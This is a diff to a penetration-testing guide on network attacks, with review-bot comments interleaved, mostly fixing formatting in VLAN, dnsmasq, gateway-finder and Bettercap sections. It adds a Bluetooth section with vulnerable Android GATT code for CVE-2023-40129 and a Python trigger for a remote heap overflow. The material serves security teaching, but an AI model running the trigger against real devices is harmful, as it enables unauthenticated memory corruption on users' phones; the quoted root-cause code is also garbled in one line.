diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md
index cf9367f951f..a128c17e554 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/README.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/README.md
@@ -333,7 +333,10 @@ By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN
Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\
If DHCP is not available, then use _ifconfig_ to set a static IP address.
-```
+
+VLAN interface configuration (example)
+
+```bash
root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
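Review bot: the new caption `VLAN interface configuration (example)` is plain text, while the captions already in this file are bold (compare `**Configure own DNS with dnsmasq**` in the dnsmasq hunk); make it `**VLAN interface configuration (example)**` or fold it into the preceding sentence so the caption style stays consistent. Tagging the fence `bash` is an improvement over the untagged fence, but since the block is a root-prompt transcript with tool output, `console` would be the more accurate tag.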
@@ -352,6 +355,9 @@ eth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65
root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
```
+
+
+
```bash
# Another configuration example
modprobe 8021q
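Review bot: three consecutive blank lines between the two fenced blocks is more than markdown needs; a single blank line separates them, and the extra lines only render as an unexplained gap. Since the `vconfig` transcript now sits directly before `# Another configuration example`, a one-line sentence saying why two configurations are shown (for instance that the second uses the `ip` tooling rather than the older `vconfig`) would be more useful than the whitespace.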
@@ -691,15 +697,22 @@ set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on
**Configure own DNS with dnsmasq**
```bash
-apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
+apt-get install dnsmasq
+echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
+echo "127.0.0.1 domain.example.com" > dnsmasq.hosts
+sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS
```
+
### Local Gateways
Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding.
-```
+
+gateway-finder usage example
+
+```bash
root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
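Review bot: splitting the run-together dnsmasq line is the right fix, but the rewrite drops the inline comments the original carried (`#Create dnsmasq.conf` and the note that the hosts listed in `dnsmasq.hosts` are the domains the resolver will answer); keep them on the new lines, e.g. `echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf # Create dnsmasq.conf`. Also `apt-get install dnsmasq` is shown without `sudo` while `sudo dnsmasq -C dnsmasq.conf --no-daemon` uses it; pick one. The `gateway-finder usage example` caption has the same plain-text-versus-bold inconsistency as the other new captions in this patch.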
@@ -717,6 +730,9 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
```
+
+
+
### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
For local host resolution when DNS lookups are unsuccessful, Microsoft systems rely on **Link-Local Multicast Name Resolution (LLMNR)** and the **NetBIOS Name Service (NBT-NS)**. Similarly, **Apple Bonjour** and **Linux zero-configuration** implementations utilize **Multicast DNS (mDNS)** for discovering systems within a network. Due to the unauthenticated nature of these protocols and their operation over UDP, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services.
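Review bot: as in the earlier hunk, the three added blank lines before `### [Spoofing LLMNR, NBT-NS, and mDNS]` should be a single blank line; repeated blank lines carry no meaning in markdown and just widen the gap between the gateway-finder output and the next section.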
@@ -796,7 +812,7 @@ Note that in order to perform this attack the victim has to try to access initia
More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly).
-**sslStrip or sslStrip+ doesn;t work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.**
+**sslStrip or sslStrip+ doesn't work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.**
TODO: easy-creds, evilgrade, metasploit, factory
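Review bot: good catch on `doesn;t`; while this line is being touched, `the first time that a user access` should read `accesses`, and `presaved rules` would be clearer as `preloaded rules`, since the linked hstspreload site is the HSTS preload list and that is the term readers will search for.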
@@ -840,6 +856,9 @@ Other things to test is to try to sign the certificate with a valid certificate
## Bettercap
+
+Common Bettercap commands
+
```bash
# Events
events.stream off #Stop showing events
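Review bot: `Common Bettercap commands` repeats the `## Bettercap` heading directly above it and, like the other new captions, is plain text rather than bold; either drop it or make it say something the heading does not, for example which Bettercap version the command list was checked against.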
@@ -866,6 +885,9 @@ set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap
```
+
+
+
### Active Discovery Notes
Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent.
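Review bot: same whitespace point as the previous hunks: one blank line before `### Active Discovery Notes` is enough. While here, the unchanged context line `a device that do not have the requested port` should read `does not have`.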
@@ -897,6 +919,70 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19
Bettercap broadcast WSD packets searching for services (UDP Port 3702).
+## Bluetooth (L2CAP/ATT/GATT) Attacks
+
+- Android Fluoride exposes services over L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Services register via:
+
+```c
+uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
+ bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
+ uint16_t my_mtu, uint16_t required_remote_mtu,
+ uint16_t sec_level);
+```
+
+- BlueBlue framework enables Scapy-based L2CAP/ATT crafting (built on BlueBorne l2cap_infra). Example:
+
+```python
+acl = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
+gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
+gatt.send_frag(p8(GATT_READ)+p16(1234))
+print(gatt.recv())
+```
+
+- CVE-2023-40129 (Fluoride GATT): integer underflow in Read Multiple Variable response builder can cause ~64KB heap overflow when MTU truncates a variable-length element but the +2 length field is not accounted for.
+
+
+Root cause (GATT Read Multiple Variable)
+
+```c
+static void build_read_multi_rsp(tGATT_SR_CMD* p_cmd, uint16_t mtu) {
+ uint16_t ii, total_len, len; uint8_t* p; bool is_overflow=false;
+ len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu;
+ BT_HDR* p_buf = (BT_HDR*)osi_calloc(len); p_buf->offset=L2CAP_MIN_OFFSET;
+ p = (uint8_t*)(p_buf + 1) + p_buf->offset; *p++ = GATT_RSP_READ_MULTI_VAR;
+ p_buf->len=1;
+ for (ii=0; iimulti_req.num_handles; ii++) {
+ tGATTS_RSP* p_rsp = ...; // dequeued
+ if (p_rsp) {
+ total_len = (p_buf->len + p_rsp->attr_value.len);
+ if (p_cmd->multi_req.variable_len) total_len += 2;
+ if (total_len > mtu) {
+ len = p_rsp->attr_value.len - (total_len - mtu); // BUG: ignores +2
+ is_overflow = true;
+ } else { len = p_rsp->attr_value.len; }
+ if (p_cmd->multi_req.variable_len) { UINT16_TO_STREAM(p, len); p_buf->len += 2; }
+ memcpy(p, p_rsp->attr_value.value, len); // heap overflow
+ if (!is_overflow) p += len; p_buf->len += len; if (is_overflow) break;
+ }
+ }
+}
+```
+
+- On variable-length entries, the overflow path subtracts only (total_len - mtu), ignoring the +2 length field, so len underflows (e.g., 0xFFFE) and memcpy writes ~64KB past the end of the buffer.
+
+
+- Minimal unauthenticated trigger (small MTU forces underflow on the 4th attribute):
+
+```python
+# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
+acl = ACLConnection(interface, bdaddr)
+gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
+pkt = b'\x20' # opcode
+pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
+gatt.send(pkt)
+# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite
+```
+
### Telecom / Mobile-Core (GTP) Exploitation
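Review bot: the `for` header in the root-cause snippet, `for (ii=0; iimulti_req.num_handles; ii++)`, has lost its comparison operator and struct access (almost certainly `<` and `p_cmd->` were stripped when the code was pasted); it should read `for (ii = 0; ii < p_cmd->multi_req.num_handles; ii++)`, otherwise the one block meant to show the bug does not even parse. Two smaller issues in the same hunk: the two Python snippets disagree on the API they illustrate (`ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')` with `send_frag` in the first, `ACLConnection(interface, bdaddr)` with `send` in the second), so one of them should be corrected to match the framework's real constructor and send method; and the arithmetic in the final comment (`p_buf->len=55 (1 + 3*(16+2))`) silently assumes every handle returns a 16-byte value, which the text should state alongside the MTU so the underflow claim can be followed. The CVE bullet would also benefit from naming the fix (the corrected length computation and the Android bulletin or patch level that shipped it) so readers can check whether a given build is still affected, and the doubled blank lines after the CVE bullet and after the underflow bullet should be single.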
@@ -910,6 +996,8 @@ telecom-network-exploitation.md
- **Network Security Assessment: Know Your Network (3rd edition)**
- **Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood**
- [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
+- [Paint it blue: Attacking the bluetooth stack (Synacktiv)](https://www.synacktiv.com/en/publications/paint-it-blue-attacking-the-bluetooth-stack)
+- [BlueBorne L2CAP testing infra (l2cap_infra)](https://github.com/ArmisSecurity/blueborne/tree/master/l2cap_infra)
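Review bot: the new Bluetooth section never points at these two references, so a reader of that section has no link to the write-up the root-cause snippet and CVE analysis are taken from; add an inline link to the Synacktiv post where CVE-2023-40129 is introduced (and to `l2cap_infra` where BlueBlue is mentioned) in the section itself rather than only in the reference list at the bottom.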